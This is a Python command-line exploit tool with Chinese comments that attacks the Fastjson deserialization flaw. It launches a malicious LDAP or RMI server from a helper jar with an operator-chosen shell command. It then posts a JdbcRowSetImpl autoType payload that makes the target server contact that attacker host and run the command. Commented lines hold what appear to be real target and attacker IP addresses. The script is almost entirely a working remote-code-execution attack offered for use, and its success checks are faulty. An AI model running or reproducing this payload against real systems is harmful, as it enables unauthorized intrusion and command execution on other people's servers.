import requests
import subprocess
import time
import argparse
import sys


print ('本工具会占用28888端口，如果此端口正在使用可能会导致执行失败')
#url = input ("请输入漏洞url地址：")
#server_ip = input("输入自己IP，如果是VPS请输入公网IP：")
#url = "http://139.9.204.178:8090/"
#server_ip = "8.129.62.140"
#command = input("请输入执行的命令：")


proxies = {
    "http":"http://127.0.0.1:8080",
    "https":"http://127.0.0.1:8080"
}

headers = {
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
}

def send_payload():
    if mode == 2: 
        data = '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://'+server_ip+':28888/Object","autoCommit":true}}'
    else:
        data = '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://'+server_ip+':28888/Object","autoCommit":true}}'

    fastjson_payload = requests.post(url=url,headers=headers,data=data)


    if fastjson_payload.status_code == 500 or 400:
        print ('发送成功')
    else:
        print ('发送失败')


if __name__ == "__main__":
    parser = argparse.ArgumentParser(prog='Fastjson one-key command is executed!',
                                     description='python3 fastjson.py -u [Target Url] -s [self IP] -c [command]',
                                     epilog='python3 fastjson.py -u http://192.168.1.3/ -s 192.168.1.1 -c "touch /tmp/test.txt')
    parser.add_argument('-u', '--url', type=str, help='漏洞url')
    parser.add_argument('-s', '--self', type=str, help='自己IP，如果是VPS请输入公网IP')
    parser.add_argument('-c', '--commamd', type=str, help='执行的命令,有空格请加上双引号')
    parser.add_argument('-m', '--mode', nargs='?', const=1, type=int, help='选择执行模式(可选)，1：ldap模式(默认)；2：rmi模式')
    args = parser.parse_args()
    url = args.url
    mode = args.mode
    server_ip = args.self
    command = args.commamd
    try:
        if mode == 2:
            child = subprocess.Popen( ['java', '-cp', 'fastjson-exploit.jar','fastjson.HRMIServer',server_ip,'28888', command], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
        else:
            child = subprocess.Popen( ['java', '-cp', 'fastjson-exploit.jar','fastjson.HLDAPServer',server_ip,'28888', command], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
            
    except:
        print ('参数输入错误，请输入python3 fastjson.py -h查看使用帮助')
        sys.exit(0)
    time.sleep(3)
    send_payload()
    print ('out:'+child.stdout.read().decode())
    print ('err:'+child.stderr.read().decode())
    if child.stderr.read().decode().find("*"):
        print ('exploit sucess!!!')
    else:
        print ('exploit failure!!!')


